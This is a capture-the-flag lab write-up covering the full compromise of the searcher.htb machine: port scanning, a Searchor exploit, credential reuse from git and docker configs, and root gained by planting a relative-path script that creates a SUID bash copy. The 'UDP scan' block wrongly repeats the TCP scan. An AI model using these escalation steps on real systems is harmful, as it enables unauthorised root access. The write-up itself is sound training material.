#tryhackme #linux #easy #tjnull #gitea ![[Pasted image 20250803140704.png]] # Information Gathering - Nmap I began with scanning all TCP ports and discovered two open ports: 22 and 80. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap -Pn -n --open $IP --min-rate 3000 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 16:07 UTC Nmap scan report for 10.10.11.208 Host is up (0.054s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 16.74 seconds ``` Then another TCP scan against ports 22 and 80 for more information. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap -sCV $IP -p 22,80 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 16:09 UTC Nmap scan report for 10.10.11.208 Host is up (0.045s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA) |_ 256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519) 80/tcp open http Apache httpd 2.4.52 |_http-server-header: Apache/2.4.52 (Ubuntu) |_http-title: Did not follow redirect to http://searcher.htb/ Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.69 seconds ``` Lastly a UDP scan against top 10 ports ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap -sCV $IP -p 22,80 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 16:09 UTC Nmap scan report for 10.10.11.208 Host is up (0.045s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA) |_ 256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519) 80/tcp open http Apache httpd 2.4.52 |_http-server-header: Apache/2.4.52 (Ubuntu) |_http-title: Did not follow redirect to http://searcher.htb/ Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.69 seconds ``` # Enumeration ##### HTTP - TCP 80 Nmap says it did not follow redirect to `http://searcher.htb`, so I added the following in `/etc/hosts` to map the IP address to the domain. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ echo "10.10.11.208 searcher.htb" | sudo tee -a /etc/hosts [sudo] password for kali: 10.10.11.208 searcher.htb ``` As the title of the webpage suggests, the page allows you to choose the platform you want to search on and enter what you'd like to search for. If you check the "Auto redirect" option, it will immediately redirect you to the corresponding page. If you don't select it, the page seems to return the platform's URL along with the string you intended to search for as parameters. ![[Pasted image 20250803111214.png]] ![[Pasted image 20250803111732.png]]![[Pasted image 20250803111741.png]] At the bottom of the page, I noticed the page was built using `Flask` and `Searchor 2.4.0`. ![[Pasted image 20250803112754.png]] # Initial Access - shell as `svc` I looked up `Searcher 2.4.0 exploit site:github.com` on Google and there was a known vulnerability to this version. ![[Pasted image 20250803112906.png]] Got a reverse shell as `svc` user. ![[Pasted image 20250803113943.png]] Found `user.txt` in `/home/svc` ```bash svc@busqueda:~$ ls user.txt svc@busqueda:~$ cat user.txt 630... ``` # Privilege Escalation `ls -la` command revealed `.gitconfig` file. ```bash svc@busqueda:~$ ls -la total 44 drwxr-x--- 6 svc svc 4096 Aug 2 17:01 . drwxr-xr-x 3 root root 4096 Dec 22 2022 .. lrwxrwxrwx 1 root root 9 Feb 20 2023 .bash_history -> /dev/null -rw-r--r-- 1 svc svc 220 Jan 6 2022 .bash_logout -rw-r--r-- 1 svc svc 3771 Jan 6 2022 .bashrc drwx------ 2 svc svc 4096 Feb 28 2023 .cache -rw-rw-r-- 1 svc svc 76 Apr 3 2023 .gitconfig drwx------ 3 svc svc 4096 Aug 2 17:04 .gnupg drwxrwxr-x 5 svc svc 4096 Jun 15 2022 .local lrwxrwxrwx 1 root root 9 Apr 3 2023 .mysql_history -> /dev/null -rw-r--r-- 1 svc svc 807 Jan 6 2022 .profile lrwxrwxrwx 1 root root 9 Feb 20 2023 .searchor-history.json -> /dev/null drwx------ 3 svc svc 4096 Aug 2 16:59 snap -rw-r----- 1 root svc 33 Aug 2 16:06 user.txt svc@busqueda:~$ cat .gitconfig [user] email = [email protected] name = cody [core] hooksPath = no-hooks ``` I spent a lot of time trying to find a lead for PrivEsc. Then I revisited `/var/www` directory and listed all of the directories and files including hidden ones and I found `.git` directory. I can't believe I didn't think to list all the files in `/var/www` earlier. ```bash svc@busqueda:/var/www/app$ ls -la total 20 drwxr-xr-x 4 www-data www-data 4096 Apr 3 2023 . drwxr-xr-x 4 root root 4096 Apr 4 2023 .. -rw-r--r-- 1 www-data www-data 1124 Dec 1 2022 app.py drwxr-xr-x 8 www-data www-data 4096 Aug 2 16:06 .git drwxr-xr-x 2 www-data www-data 4096 Dec 1 2022 templates ``` in `/var/www/app/.git/config`, `gitea` is mentioned. Let's update our `/etc/hosts` file by adding `gitea.searcher.htb`. ![[Pasted image 20250803122152.png]] ![[Pasted image 20250803122819.png]] I logged in as `cody` with the found credentials ![[Pasted image 20250803122854.png]] But the repo didn't have much interesting information. ![[Pasted image 20250803122950.png]] I wanted to run `sudo -l` command to see if the current user can run any commands with `sudo` privileges, but it prompts me to enter password, and I do not know the password of `svc` user. I tried Cody's password and it worked! I didn't think to try Cody's password for the `svc` user but it makes sense that `svc` and Cody are probably the same person because `/etc/passwd` doesn't list `cody`. ```bash svc@busqueda:/var/www/app/.git$ sudo -l [sudo] password for svc: Matching Defaults entries for svc on busqueda: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User svc may run the following commands on busqueda: (root) /usr/bin/python3 /opt/scripts/system-checkup.py * svc@busqueda:/var/www/app/.git$ ``` The current user cannot read or write `/opt/scripts/system-checkup.py`. Can only execute it ```bash svc@busqueda:/var/www/app/.git$ cat /opt/scripts/system-checkup.py cat: /opt/scripts/system-checkup.py: Permission denied svc@busqueda:/var/www/app/.git$ ls -l /opt/scripts/system-checkup.py -rwx--x--x 1 root root 1903 Dec 24 2022 /opt/scripts/system-checkup.py ``` Also you cannot run it without arguments, so I tried `test` as an argument and it returned the following: ```bash svc@busqueda:/var/www/app/.git$ sudo python3 /opt/scripts/system-checkup.py test Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2) docker-ps : List running docker containers docker-inspect : Inpect a certain docker container full-checkup : Run a full system checkup svc@busqueda:/var/www/app/.git$ ``` `docker-ps` as the argument returned 2 running docker processes. ```bash svc@busqueda:/var/www/app/.git$ sudo python3 /opt/scripts/system-checkup.py docker-ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 960873171e2e gitea/gitea:latest "/usr/bin/entrypoint…" 2 years ago Up 2 hours 127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp gitea f84a6b33fb5a mysql:8 "docker-entrypoint.s…" 2 years ago Up 2 hours 127.0.0.1:3306->3306/tcp, 33060/tcp mysql_db ``` `docker-inspect` command requires `format` and `container-name` ```bash svc@busqueda:/var/www/app/.git$ sudo python3 /opt/scripts/system-checkup.py docker-inspect Usage: /opt/scripts/system-checkup.py docker-inspect <format> <container_name> ``` `full-checkup` returns "something went wrong". ```bash svc@busqueda:/var/www/app/.git$ sudo python3 /opt/scripts/system-checkup.py full-checkup Something went wrong ``` I searched for `docker inspect format` and the official docker documentation came up. I decided to print all of the contents as json with the format as `{{ json .}}` ![[Pasted image 20250803130044.png]] ![[Pasted image 20250803130108.png]] I piped the command into `jq` to prettify the json contents. `sudo python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' gitea | jq .` ![[Pasted image 20250803125951.png]] As I scrolled down in the contents, I found Gitea DB credentials. There also was `mysql_db` docker process. Let's check that out. ![[Pasted image 20250803130417.png]] `sudo python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' mysql_db | jq .` revealed the password of Mysql_root. This might be the password of `root`. Let's test it. ![[Pasted image 20250803130620.png]] Nope it wasn't the password for `root` ```bash svc@busqueda:/var/www/app/.git$ su root Password: su: Authentication failure ``` Yes, it was the password for `mysql root user` ```bash svc@busqueda:/var/www/app/.git$ mysql -h 127.0.0.1 -u root -p Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 306 Server version: 8.0.31 MySQL Community Server - GPL Copyright (c) 2000, 2023, Oracle and/or its affiliates. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> ``` `show databases;` command revealed there is `gitea` DB. ```bash mysql> show databases; +--------------------+ | Database | +--------------------+ | gitea | | information_schema | | mysql | | performance_schema | | sys | +--------------------+ 5 rows in set (0.03 sec) mysql> use gitea; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A ``` This DB contained so many tables but the one I'm interested in is this table named `user` ```bash mysql> show tables; +---------------------------+ | Tables_in_gitea | +---------------------------+ | access | | access_token | | action | | app_state | | attachment | ... <SNIP> ``` The table included credentials for `cody` and `administrator` ![[Pasted image 20250803131329.png]] Before cracking the hash for password, now that I have found more passwords, I navigated back to `Gitea` and tried logging in as `administrator` ![[Pasted image 20250803132240.png]] Successfully logged in as `administrator` on `Gitea`. ![[Pasted image 20250803132300.png]] `system-checkup.py` code shows that why `full-checkup` failed to run. It's taking `full-checkup.sh` file as argument but in order for this to be run without error, you have to be in the same directory as the file when you are running the command because it's using relative path. ![[Pasted image 20250803133102.png]] When I cd into `/opt/scripts` and ran `full-checkup`, it worked just fine. ![[Pasted image 20250803134257.png]] To exploit this vulnerability, I am going to copy `/bin/bash` to `/tmp/wook` and gives full permissions to the file and also set the SUID bit. Again, simply put, when `full-checkup.sh` is run, it will generate `wook` file in `tmp` directory and it's going to have the SUID bit set, which means anyone who's going to run the file will run it with root privileges. ```bash svc@busqueda:/tmp$ echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/wook\nchmod 4777 /tmp/wook' > full-checkup.sh svc@busqueda:/tmp$ cat full-checkup.sh #!/bin/bash cp /bin/bash /tmp/wook chmod 4777 /tmp/wook svc@busqueda:/tmp$ chmod +x full-checkup.sh svc@busqueda:/tmp$ ls full-checkup.sh ``` As you can see `wook` is created and it's got full permissions with the SUID bit set. ![[Pasted image 20250803135403.png]] I'll run it with `-p` option not to drop root privileges. ```bash svc@busqueda:/tmp$ ./wook -p wook-5.1# whoami root ``` Got `root.txt` ```bash wook-5.1# cd /root wook-5.1# ls ecosystem.config.js root.txt scripts snap wook-5.1# cat root.txt 6a1... ```